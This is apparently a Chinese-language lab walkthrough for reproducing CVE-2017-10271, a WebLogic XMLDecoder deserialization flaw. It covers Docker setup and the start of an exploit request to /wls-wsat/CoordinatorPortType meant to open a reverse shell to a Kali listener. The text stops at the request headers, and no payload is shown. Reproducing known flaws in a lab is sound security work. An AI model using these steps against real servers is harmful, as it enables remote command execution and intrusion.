Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
环境搭建
启动测试环境:
docker-compose up -d
等待一段时间,访问http://your-ip:7001/
即可看到一个404页面,说明weblogic已成功启动。
漏洞复现
发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):
漏洞检测
漏洞利用,反弹shell
在kali监听
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.148:7001
Accept-Encoding: gzip, deflate
Accept: